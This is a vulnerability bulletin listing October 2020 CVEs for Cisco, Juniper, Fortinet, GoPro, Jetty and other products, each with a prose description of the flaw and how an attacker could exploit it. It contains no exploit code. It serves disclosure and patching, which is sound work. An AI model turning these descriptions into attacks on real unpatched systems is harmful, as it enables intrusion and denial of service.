cisco — adaptive_security_appliance_and_firepower_threat_defense_software	Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section.	2020-10-21	not yet calculated	CVE-2020-3582 CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software	A vulnerability in the IP fragment-handling implementation of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a memory leak on an affected device. This memory leak could prevent traffic from being processed through the device, resulting in a denial of service (DoS) condition. The vulnerability is due to improper error handling when specific failures occur during IP fragment reassembly. An attacker could exploit this vulnerability by sending crafted, fragmented IP traffic to a targeted device. A successful exploit could allow the attacker to continuously consume memory on the affected device and eventually impact traffic, resulting in a DoS condition. The device could require a manual reboot to recover from the DoS condition. Note: This vulnerability applies to both IP Version 4 (IPv4) and IP Version 6 (IPv6) traffic.	2020-10-21	not yet calculated	CVE-2020-3373 CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software	A vulnerability in the OSPF Version 2 (OSPFv2) implementation of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a denial of service (DoS) condition. The vulnerability is due to incomplete input validation when the affected software processes certain OSPFv2 packets with Link-Local Signaling (LLS) data. An attacker could exploit this vulnerability by sending a malformed OSPFv2 packet to an affected device. A successful exploit could allow the attacker to cause an affected device to reload, resulting in a DoS condition.	2020-10-21	not yet calculated	CVE-2020-3528 CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software	Multiple vulnerabilities in the secure boot process of Cisco Adaptive Security Appliance (ASA) Software and Firepower Threat Defense (FTD) Software for the Firepower 1000 Series and Firepower 2100 Series Appliances could allow an authenticated, local attacker to bypass the secure boot mechanism. The vulnerabilities are due to insufficient protections of the secure boot process. An attacker could exploit these vulnerabilities by injecting code into specific files that are then referenced during the device boot process. A successful exploit could allow the attacker to break the chain of trust and inject code into the boot process of the device, which would be executed at each boot and maintain persistence across reboots.	2020-10-21	not yet calculated	CVE-2020-3458 CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software	A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to upload arbitrary-sized files to specific folders on an affected device, which could lead to an unexpected device reload. The vulnerability exists because the affected software does not efficiently handle the writing of large files to specific folders on the local file system. An attacker could exploit this vulnerability by uploading files to those specific folders. A successful exploit could allow the attacker to write a file that triggers a watchdog timeout, which would cause the device to unexpectedly reload, causing a denial of service (DoS) condition.	2020-10-21	not yet calculated	CVE-2020-3436 CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software	A vulnerability in the web interface of Cisco Adaptive Security Appliance (ASA) Software and Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. The vulnerability is due to a lack of proper input validation of HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to cause a DoS condition. Note: This vulnerability applies to IP Version 4 (IPv4) and IP Version 6 (IPv6) HTTP traffic.	2020-10-21	not yet calculated	CVE-2020-3304 CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software	A vulnerability in the SSL VPN negotiation process for Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a reload of an affected device, resulting in a denial of service (DoS) condition. The vulnerability is due to inefficient direct memory access (DMA) memory management during the negotiation phase of an SSL VPN connection. An attacker could exploit this vulnerability by sending a steady stream of crafted Datagram TLS (DTLS) traffic to an affected device. A successful exploit could allow the attacker to exhaust DMA memory on the device and cause a DoS condition.	2020-10-21	not yet calculated	CVE-2020-3529 CISCO
cisco — adaptive_security_appliance_software	A vulnerability in the web-based management interface of Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information.	2020-10-21	not yet calculated	CVE-2020-3599 CISCO
cisco — firepower_chassis_manager	A vulnerability in the Cisco Firepower Chassis Manager (FCM) of Cisco FXOS Software could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack against a user of an affected device. The vulnerability is due to insufficient CSRF protections for the FCM interface. An attacker could exploit this vulnerability by persuading a targeted user to click a malicious link. A successful exploit could allow the attacker to send arbitrary requests that could take unauthorized actions on behalf of the targeted user.	2020-10-21	not yet calculated	CVE-2020-3456 CISCO
cisco — firepower_management_center	A vulnerability in the Common Access Card (CAC) authentication feature of Cisco Firepower Management Center (FMC) Software could allow an unauthenticated, remote attacker to bypass authentication and access the FMC system. The attacker must have a valid CAC to initiate the access attempt. The vulnerability is due to incorrect session invalidation during CAC authentication. An attacker could exploit this vulnerability by performing a CAC-based authentication attempt to an affected system. A successful exploit could allow the attacker to access an affected system with the privileges of a CAC-authenticated user who is currently logged in.	2020-10-21	not yet calculated	CVE-2020-3410 CISCO
cisco — firepower_management_center_and_firepower_threat_defense_software	A vulnerability in the sfmgr daemon of Cisco Firepower Management Center (FMC) Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, remote attacker to perform directory traversal and access directories outside the restricted path. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by using a relative path in specific sfmgr commands. An exploit could allow the attacker to read or write arbitrary files on an sftunnel-connected peer device.	2020-10-21	not yet calculated	CVE-2020-3550 CISCO
cisco — firepower_management_center_and_firepower_threat_defense_software	A vulnerability in the sftunnel functionality of Cisco Firepower Management Center (FMC) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to obtain the device registration hash. The vulnerability is due to insufficient sftunnel negotiation protection during initial device registration. An attacker in a man-in-the-middle position could exploit this vulnerability by intercepting a specific flow of the sftunnel communication between an FMC device and an FTD device. A successful exploit could allow the attacker to decrypt and modify the sftunnel communication between FMC and FTD devices, allowing the attacker to modify configuration data sent from an FMC device to an FTD device or alert data sent from an FTD device to an FMC device.	2020-10-21	not yet calculated	CVE-2020-3549 CISCO
cisco — firepower_management_center_software	A vulnerability in the host input API daemon of Cisco Firepower Management Center (FMC) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to improper certificate validation. An attacker could exploit this vulnerability by sending a crafted data stream to the host input daemon of the affected device. A successful exploit could allow the attacker to cause the host input daemon to restart. The attacker could use repeated attacks to cause the daemon to continuously reload, creating a DoS condition for the API.	2020-10-21	not yet calculated	CVE-2020-3557 CISCO
cisco — firepower_management_center_software	A vulnerability in the licensing service of Cisco Firepower Management Center (FMC) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition.The vulnerability is due to improper handling of system resource values by the affected system. An attacker could exploit this vulnerability by sending malicious requests to the targeted system. A successful exploit could allow the attacker to cause the affected system to become unresponsive, resulting in a DoS condition and preventing the management of dependent devices.	2020-10-21	not yet calculated	CVE-2020-3499 CISCO
cisco — firepower_management_center_software	Multiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. These vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information.	2020-10-21	not yet calculated	CVE-2020-3553 CISCO
cisco — firepower_management_center_software	Multiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. These vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information.	2020-10-21	not yet calculated	CVE-2020-3515 CISCO
cisco — firepower_management_center_software	A vulnerability in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an unauthenticated, remote attacker to redirect a user to a malicious web page. The vulnerability is due to improper input validation of the parameters of an HTTP request. An attacker could exploit this vulnerability by intercepting an HTTP request from a user. A successful exploit could allow the attacker to modify the HTTP request to cause the interface to redirect the user to a specific, malicious URL. This type of vulnerability is known as an open redirect attack and is used in phishing attacks that get users to unknowingly visit malicious sites.	2020-10-21	not yet calculated	CVE-2020-3558 CISCO
cisco — firepower_threat_defense_software	A vulnerability in the multi-instance feature of Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker to escape the container for their Cisco FTD instance and execute commands with root privileges in the host namespace. The attacker must have valid credentials on the device.The vulnerability exists because a configuration file that is used at container startup has insufficient protections. An attacker could exploit this vulnerability by modifying a specific container configuration file on the underlying file system. A successful exploit could allow the attacker to execute commands with root privileges within the host namespace. This could allow the attacker to impact other running Cisco FTD instances or the host Cisco FXOS device.	2020-10-21	not yet calculated	CVE-2020-3514 CISCO
cisco — firepower_threat_defense_software	A vulnerability in the Simple Network Management Protocol (SNMP) input packet processor of Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to restart unexpectedly. The vulnerability is due to a lack of sufficient memory management protections under heavy SNMP polling loads. An attacker could exploit this vulnerability by sending a high rate of SNMP requests to the SNMP daemon through the management interface on an affected device. A successful exploit could allow the attacker to cause the SNMP daemon process to consume a large amount of system memory over time, which could then lead to an unexpected device restart, causing a denial of service (DoS) condition. This vulnerability affects all versions of SNMP.	2020-10-21	not yet calculated	CVE-2020-3533 CISCO
cisco — fxos_software	A vulnerability in the CLI of Cisco FXOS Software could allow an authenticated, local attacker to inject arbitrary commands that are executed with root privileges. The vulnerability is due to insufficient input validation of commands supplied by the user. An attacker could exploit this vulnerability by authenticating to a device and submitting crafted input to the affected command. A successful exploit could allow the attacker to execute commands on the underlying operating system with root privileges.	2020-10-21	not yet calculated	CVE-2020-3457 CISCO
cisco — fxos_software	A vulnerability in the CLI of Cisco FXOS Software could allow an authenticated, local attacker to inject arbitrary commands that are executed with root privileges. The vulnerability is due to insufficient input validation of commands supplied by the user. An attacker could exploit this vulnerability by authenticating to a device and submitting crafted input to the affected command. A successful exploit could allow the attacker to execute commands on the underlying operating system with root privileges.	2020-10-21	not yet calculated	CVE-2020-3459 CISCO
cisco — fxos_software	A vulnerability in the secure boot process of Cisco FXOS Software could allow an authenticated, local attacker to bypass the secure boot mechanisms. The vulnerability is due to insufficient protections of the secure boot process. An attacker could exploit this vulnerability by injecting code into a specific file that is then referenced during the device boot process. A successful exploit could allow the attacker to break the chain of trust and inject code into the boot process of the device which would be executed at each boot and maintain persistence across reboots.	2020-10-21	not yet calculated	CVE-2020-3455 CISCO
cisco — multiple_products	Multiple Cisco products are affected by a vulnerability in the Snort detection engine that could allow an unauthenticated, remote attacker to bypass a configured File Policy for HTTP. The vulnerability is due to incorrect detection of modified HTTP packets used in chunked responses. An attacker could exploit this vulnerability by sending crafted HTTP packets through an affected device. A successful exploit could allow the attacker to bypass a configured File Policy for HTTP packets and deliver a malicious payload.	2020-10-21	not yet calculated	CVE-2020-3299 CISCO
comtrend — ar-5387un_routers	A cross-site scripting (XSS) vulnerability on Comtrend AR-5387un devices with A731-410JAZ-C04_R02.A2pD035g.d23i firmware allows remote attackers to inject arbitrary web script or HTML via the Service Description parameter while creating a WAN service.	2020-10-23	not yet calculated	CVE-2018-8062 MISC
crmeb — crmeb	A SSRF vulnerability exists in the downloadimage interface of CRMEB 3.0, which can remotely download arbitrary files on the server and remotely execute arbitrary code.	2020-10-23	not yet calculated	CVE-2020-25466 MISC MISC MISC
crossbeam — crossbeam	Crossbeam is a set of tools for concurrent programming. In crossbeam-channel before version 0.4.4, the bounded channel incorrectly assumes that `Vec::from_iter` has allocated capacity that same as the number of iterator elements. `Vec::from_iter` does not actually guarantee that and may allocate extra memory. The destructor of the `bounded` channel reconstructs `Vec` from the raw pointer based on the incorrect assumes described above. This is unsound and causing deallocation with the incorrect capacity when `Vec::from_iter` has allocated different sizes with the number of iterator elements. This has been fixed in crossbeam-channel 0.4.4.	2020-10-16	not yet calculated	CVE-2020-15254 MISC MISC CONFIRM MISC
cryptopro — csp	CryptoPro CSP through 5.0.0.10004 on 32-bit platforms allows Local Privilege Escalation (by local users with the SeChangeNotifyPrivilege right) because user-mode input is mishandled during process creation. An attacker can write arbitrary data to an arbitrary location in the kernel’s address space.	2020-10-23	not yet calculated	CVE-2020-9331 MISC
cryptopro — csp	CryptoPro CSP through 5.0.0.10004 on 64-bit platforms allows local users with the SeChangeNotifyPrivilege right to cause denial of service because user-mode input is mishandled during process creation.	2020-10-23	not yet calculated	CVE-2020-9361 MISC
dedetech — dedecms	A Cross Site Scripting (XSS) issue was discovered in the search feature of DedeCMS v.5.8 that allows malicious users to inject code into web pages, and other users will be affected when viewing web pages.	2020-10-22	not yet calculated	CVE-2020-27533 MISC
domainmod — domainmod	DomainMOD before 4.14.0 uses MD5 without a salt for password storage.	2020-10-20	not yet calculated	CVE-2019-9080 MISC
eclipse — jetty	In Eclipse Jetty versions 1.0 thru 9.4.32.v20200930, 10.0.0.alpha1 thru 10.0.0.beta2, and 11.0.0.alpha1 thru 11.0.0.beta2O, on Unix like systems, the system’s temporary directory is shared between all users on that system. A collocated user can observe the process of creating a temporary sub directory in the shared temporary directory and race to complete the creation of the temporary subdirectory. If the attacker wins the race then they will have read and write permission to the subdirectory used to unpack web applications, including their WEB-INF/lib jar files and JSP files. If any code is ever executed out of this temporary directory, this can lead to a local privilege escalation vulnerability.	2020-10-23	not yet calculated	CVE-2020-27216 CONFIRM CONFIRM
elasticsearch — elasticsearch	Elasticsearch versions before 6.8.13 and 7.9.2 contain a document disclosure flaw when Document or Field Level Security is used. Search queries do not properly preserve security permissions when executing certain complex queries. This could result in the search disclosing the existence of documents the attacker should not be able to view. This could result in an attacker gaining additional insight into potentially sensitive indices.	2020-10-22	not yet calculated	CVE-2020-7020 MISC MISC
excast — pro_ii	In EZCast Pro II, the administrator password md5 hash is provided upon a web request. This hash can be cracked to access the administration panel of the device.	2020-10-16	not yet calculated	CVE-2019-12305 MISC
eyoucms — eyoucms	A CSRF vulnerability in Eyoucms v1.2.7 allows an attacker to add an admin account via login.php.	2020-10-22	not yet calculated	CVE-2020-18129 MISC
fastd — fastd	receive.c in fastd before v21 allows denial of service (assertion failure) when receiving packets with an invalid type code.	2020-10-22	not yet calculated	CVE-2020-27638 MISC MISC MISC
fortinet — fortios	A cleartext storage of sensitive information vulnerability in FortiOS command line interface in versions 6.2.4 and below may allow an authenticated attacker to obtain sensitive information such as users passwords by connecting to FortiGate CLI and executing the “diag sys ha checksum show” command.	2020-10-21	not yet calculated	CVE-2020-6648 CONFIRM
freebox — freebox_server	A DNS rebinding vulnerability in the UPnP MediaServer implementation in Freebox Server before 4.2.3.	2020-10-19	not yet calculated	CVE-2020-24375 CONFIRM MISC
fritz!os — fritz!os	FRITZ!OS before 7.21 on FRITZ!Box devices allows a bypass of a DNS Rebinding protection mechanism.	2020-10-23	not yet calculated	CVE-2020-26887 MISC MISC MISC
fruitywifi — fruitywifi	A Cross-Site Request Forgery (CSRF) vulnerability is identified in FruityWifi through 2.4. Due to a lack of CSRF protection in page_config_adv.php, an unauthenticated attacker can lure the victim to visit his website by social engineering or another attack vector. Due to this issue, an unauthenticated attacker can change the newSSID and hostapd_wpa_passphrase.	2020-10-23	not yet calculated	CVE-2020-24847 MISC
fruitywifi — fruitywifi	FruityWifi through 2.4 has an unsafe Sudo configuration [(ALL : ALL) NOPASSWD: ALL]. This allows an attacker to perform a system-level (root) local privilege escalation, allowing an attacker to gain complete persistent access to the local system.	2020-10-23	not yet calculated	CVE-2020-24848 MISC
fs.com — s3900_24t4s	An issue was discovered in fs.com S3900 24T4S 1.7.0 and earlier. The form does not have an authentication or token authentication mechanism that allows remote attackers to forge requests on behalf of a site administrator to change all settings including deleting users, creating new users with escalated privileges.	2020-10-22	not yet calculated	CVE-2020-24033 MISC MISC
ghisler — total_commander	An issue was discovered in Ghisler Total Commander 9.51. Due to insufficient access restrictions in the default installation directory, an attacker can elevate privileges by replacing the %SYSTEMDRIVE%totalcmdTOTALCMD64.EXE binary.	2020-10-21	not yet calculated	CVE-2020-17381 MISC
gitlab — runner	An issue has been discovered in GitLab Runner affecting all versions starting from 13.4.0 before 13.4.2, all versions starting from 13.3.0 before 13.3.7, all versions starting from 13.2.0 before 13.2.10. Insecure Runner Configuration in Kubernetes Environments	2020-10-22	not yet calculated	CVE-2020-13327 CONFIRM MISC
gopro — gpmf-parser	GoPro gpmf-parser 1.5 has a division-by-zero vulnerability in GPMF_Decompress(). Parsing malicious input can result in a crash.	2020-10-19	not yet calculated	CVE-2020-16160 MISC MISC
gopro — gpmf-parser	GoPro gpmf-parser 1.5 has a heap out-of-bounds read and segfault in GPMF_ScaledData(). Parsing malicious input can result in a crash or information disclosure.	2020-10-19	not yet calculated	CVE-2020-16159 MISC MISC
gopro — gpmf-parser	GoPro gpmf-parser 1.5 has a division-by-zero vulnerability in GPMF_ScaledData(). Parsing malicious input can result in a crash.	2020-10-19	not yet calculated	CVE-2020-16161 MISC MISC MISC
hashicorp — nomad_and_nomad_enterprise	HashiCorp Nomad and Nomad Enterprise version 0.9.0 up to 0.12.5 client file sandbox feature can be subverted using either the template or artifact stanzas. Fixed in 0.12.6, 0.11.5, and 0.10.6	2020-10-22	not yet calculated	CVE-2020-27195 CONFIRM MISC
huawei — e-6878-370	E6878-370 versions 10.0.3.1(H557SP27C233),10.0.3.1(H563SP21C233) and E6878-870 versions 10.0.3.1(H557SP27C233),10.0.3.1(H563SP11C233) have a denial of service vulnerability. The system does not properly check some events, an attacker could launch the events continually, successful exploit could cause reboot of the process.	2020-10-19	not yet calculated	CVE-2020-9111 MISC
huawei — taurus-an00b	Taurus-AN00B versions earlier than 10.1.0.156(C00E155R7P2) have a privilege elevation vulnerability. Due to lack of privilege restrictions on some of the business functions of the device. An attacker could exploit this vulnerability to access the protecting information, resulting in the elevation of the privilege.	2020-10-19	not yet calculated	CVE-2020-9112 MISC
imagemagik — imagemagick	ImageMagick 7.0.10-34 allows Division by Zero in OptimizeLayerFrames in MagickCore/layer.c, which may cause a denial of service.	2020-10-22	not yet calculated	CVE-2020-27560 MISC
jboss — eap	A flaw was found in JBoss EAP, where the authentication configuration is set-up using a legacy SecurityRealm, to delegate to a legacy PicketBox SecurityDomain, and then reloaded to admin-only mode. This flaw allows an attacker to perform a complete authentication bypass by using an arbitrary user and password. The highest threat to vulnerability is to system availability.	2020-10-16	not yet calculated	CVE-2020-14299 MISC
juniper_networks — ex2300_series_devices	On Juniper Networks EX2300 Series, receipt of a stream of specific multicast packets by the layer2 interface can cause high CPU load, which could lead to traffic interruption. This issue occurs when multicast packets are received by the layer 2 interface. To check if the device has high CPU load due to this issue, the administrator can issue the following command: user@host> show chassis routing-engine Routing Engine status: … Idle 2 percent the “Idle” value shows as low (2 % in the example above), and also the following command: user@host> show system processes summary … PID USERNAME PRI NICE SIZE RES STATE TIME WCPU COMMAND 11639 root 52 0 283M 11296K select 12:15 44.97% eventd 11803 root 81 0 719M 239M RUN 251:12 31.98% fxpc{fxpc} the eventd and the fxpc processes might use higher WCPU percentage (respectively 44.97% and 31.98% in the above example). This issue affects Juniper Networks Junos OS on EX2300 Series: 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S2, 20.1R2.	2020-10-16	not yet calculated	CVE-2020-1668 CONFIRM
juniper_networks — ex4300_series_devices	On Juniper Networks EX4300 Series, receipt of a stream of specific IPv4 packets can cause Routing Engine (RE) high CPU load, which could lead to network protocol operation issue and traffic interruption. This specific packets can originate only from within the broadcast domain where the device is connected. This issue occurs when the packets enter to the IRB interface. Only IPv4 packets can trigger this issue. IPv6 packets cannot trigger this issue. This issue affects Juniper Networks Junos OS on EX4300 series: 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2; 18.1 versions prior to 18.1R3-S10; 18.2 versions prior to 18.2R3-S4; 18.3 versions prior to 18.3R2-S4, 18.3R3-S2; 18.4 versions prior to 18.4R2-S4, 18.4R3-S2; 19.1 versions prior to 19.1R2-S2, 19.1R3-S1; 19.2 versions prior to 19.2R1-S5, 19.2R2-S1, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2; 20.1 versions prior to 20.1R1-S3, 20.1R2.	2020-10-16	not yet calculated	CVE-2020-1670 MISC
juniper_networks — junos_os	On Juniper Networks Junos OS devices configured with DHCPv6 relay enabled, receipt of a specific DHCPv6 packet might crash the jdhcpd daemon. The jdhcpd daemon automatically restarts without intervention, but continuous receipt of specific crafted DHCP messages will repeatedly crash jdhcpd, leading to an extended Denial of Service (DoS) condition. Only DHCPv6 packet can trigger this issue. DHCPv4 packet cannot trigger this issue. This issue affects Juniper Networks Junos OS: 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R2-S2, 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R2-S1, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S3, 20.1R2.	2020-10-16	not yet calculated	CVE-2020-1672 CONFIRM
juniper_networks — junos_os	A stack buffer overflow vulnerability in the device control daemon (DCD) on Juniper Networks Junos OS allows a low privilege local user to create a Denial of Service (DoS) against the daemon or execute arbitrary code in the system with root privilege. This issue affects Juniper Networks Junos OS: 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S12, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S6; 18.2X75 versions prior to 18.2X75-D53, 18.2X75-D65; 18.3 versions prior to 18.3R2-S4, 18.3R3-S4; 18.4 versions prior to 18.4R2-S5, 18.4R3-S5; 19.1 versions prior to 19.1R3-S3; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S2, 19.4R3; 20.1 versions prior to 20.1R1-S4, 20.1R2; 20.2 versions prior to 20.2R1-S1, 20.2R2. Versions of Junos OS prior to 17.3 are unaffected by this vulnerability.	2020-10-16	not yet calculated	CVE-2020-1664 CONFIRM
juniper_networks — junos_os	The system console configuration option ‘log-out-on-disconnect’ In Juniper Networks Junos OS Evolved fails to log out an active CLI session when the console cable is disconnected. This could allow a malicious attacker with physical access to the console the ability to resume a previous interactive session and possibly gain administrative privileges. This issue affects all Juniper Networks Junos OS Evolved versions after 18.4R1-EVO, prior to 20.2R1-EVO.	2020-10-16	not yet calculated	CVE-2020-1666 CONFIRM
juniper_networks — junos_os	Receipt of a specifically malformed NDP packet sent from the local area network (LAN) to a device running Juniper Networks Junos OS Evolved can cause the ndp process to crash, resulting in a Denial of Service (DoS). The process automatically restarts without intervention, but a continuous receipt of the malformed NDP packets could leaded to an extended Denial of Service condition. During this time, IPv6 neighbor learning will be affected. The issue occurs when parsing the incoming malformed NDP packet. Rather than simply discarding the packet, the process asserts, performing a controlled exit and restart, thereby avoiding any chance of an unhandled exception. Exploitation of this vulnerability is limited to a temporary denial of service, and cannot be leveraged to cause additional impact on the system. This issue is limited to the processing of IPv6 NDP packets. IPv4 packet processing cannot trigger, and is unaffected by this vulnerability. This issue affects all Juniper Networks Junos OS Evolved versions prior to 20.1R2-EVO. Junos OS is unaffected by this vulnerability.	2020-10-16	not yet calculated	CVE-2020-1681 CONFIRM
juniper_networks — junos_os	When DNS filtering is enabled on Juniper Networks Junos MX Series with one of the following cards MS-PIC, MS-MIC or MS-MPC, an incoming stream of packets processed by the Multiservices PIC Management Daemon (mspmand) process might be bypassed due to a race condition. Due to this vulnerability, mspmand process, responsible for managing “URL Filtering service”, can crash, causing the Services PIC to restart. While the Services PIC is restarting, all PIC services including DNS filtering service (DNS sink holing) will be bypassed until the Services PIC completes its boot process. This issue affects Juniper Networks Junos OS: 17.3 versions prior to 17.3R3-S8; 18.3 versions prior to 18.3R3-S1; 18.4 versions prior to 18.4R3; 19.1 versions prior to 19.1R3; 19.2 versions prior to 19.2R2; 19.3 versions prior to 19.3R3. This issue does not affect Juniper Networks Junos OS 17.4, 18.1, and 18.2.	2020-10-16	not yet calculated	CVE-2020-1667 MISC
juniper_networks — junos_os	Insufficient Cross-Site Scripting (XSS) protection in Juniper Networks J-Web and web based (HTTP/HTTPS) services allows an unauthenticated attacker to hijack the target user’s HTTP/HTTPS session and perform administrative actions on the Junos device as the targeted user. This issue only affects Juniper Networks Junos OS devices with HTTP/HTTPS services enabled such as J-Web, Web Authentication, Dynamic-VPN (DVPN), Firewall Authentication Pass-Through with Web-Redirect, and Zero Touch Provisioning (ZTP). Junos OS devices with HTTP/HTTPS services disabled are not affected. If HTTP/HTTPS services are enabled, the following command will show the httpd processes: user@device> show system processes \| match http 5260 – S 0:00.13 /usr/sbin/httpd-gk -N 5797 – I 0:00.10 /usr/sbin/httpd –config /jail/var/etc/httpd.conf In order to successfully exploit this vulnerability, the attacker needs to convince the device administrator to take action such as clicking the crafted URL sent via phishing email or convince the administrator to input data in the browser console. This issue affects Juniper Networks Junos OS: 18.1 versions prior to 18.1R3-S1; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S2; 18.4 versions prior to 18.4R2-S5, 18.4R3-S2; 19.1 versions prior to 19.1R2-S2, 19.1R3-S1; 19.2 versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2; 20.1 versions prior to 20.1R1-S2, 20.1R2. This issue does not affect Juniper Networks Junos OS prior to 18.1R1.	2020-10-16	not yet calculated	CVE-2020-1673 CONFIRM
juniper_networks — junos_os	When DNS filtering is enabled on Juniper Networks Junos MX Series with one of the following cards MS-PIC, MS-MIC or MS-MPC, an incoming stream of packets processed by the Multiservices PIC Management Daemon (mspmand) process, responsible for managing “URL Filtering service”, may crash, causing the Services PIC to restart. While the Services PIC is restarting, all PIC services including DNS filtering service (DNS sink holing) will be bypassed until the Services PIC completes its boot process. This vulnerability might allow an attacker to cause an extended Denial of Service (DoS) attack against the device and to cause clients to be vulnerable to DNS based attacks by malicious DNS servers when they send DNS requests through the device. As a result, devices which were once protected by the DNS Filtering service are no longer protected and at risk of exploitation. This issue affects Juniper Networks Junos OS: 17.3 versions prior to 17.3R3-S8; 18.3 versions prior to 18.3R3-S1; 18.4 versions prior to 18.4R3; 19.1 versions prior to 19.1R3; 19.2 versions prior to 19.2R2; 19.3 versions prior to 19.3R3. This issue does not affect Juniper Networks Junos OS 17.4, 18.1, and 18.2.	2020-10-16	not yet calculated	CVE-2020-1660 CONFIRM
juniper_networks — junos_os	An input validation vulnerability exists in Juniper Networks Junos OS, allowing an attacker to crash the srxpfe process, causing a Denial of Service (DoS) through the use of specific maintenance commands. The srxpfe process restarts automatically, but continuous execution of the commands could lead to an extended Denial of Service condition. This issue only affects the SRX1500, SRX4100, SRX4200, NFX150, NFX250, and vSRX-based platforms. No other products or platforms are affected by this vulnerability. This issue affects Juniper Networks Junos OS: 15.1X49 versions prior to 15.1X49-D220 on SRX1500, SRX4100, SRX4200, vSRX; 17.4 versions prior to 17.4R3-S3 on SRX1500, SRX4100, SRX4200, vSRX; 18.1 versions prior to 18.1R3-S11 on SRX1500, SRX4100, SRX4200, vSRX, NFX150; 18.2 versions prior to 18.2R3-S5 on SRX1500, SRX4100, SRX4200, vSRX, NFX150, NFX250; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3 on SRX1500, SRX4100, SRX4200, vSRX, NFX150, NFX250; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4 on SRX1500, SRX4100, SRX4200, vSRX, NFX150, NFX250; 19.1 versions prior to 19.1R3-S2 on SRX1500, SRX4100, SRX4200, vSRX, NFX150, NFX250; 19.2 versions prior to 19.2R1-S5, 19.2R3 on SRX1500, SRX4100, SRX4200, vSRX, NFX150, NFX250. This issue does not affect Junos OS 19.3 or any subsequent version.	2020-10-16	not yet calculated	CVE-2020-1682 CONFIRM
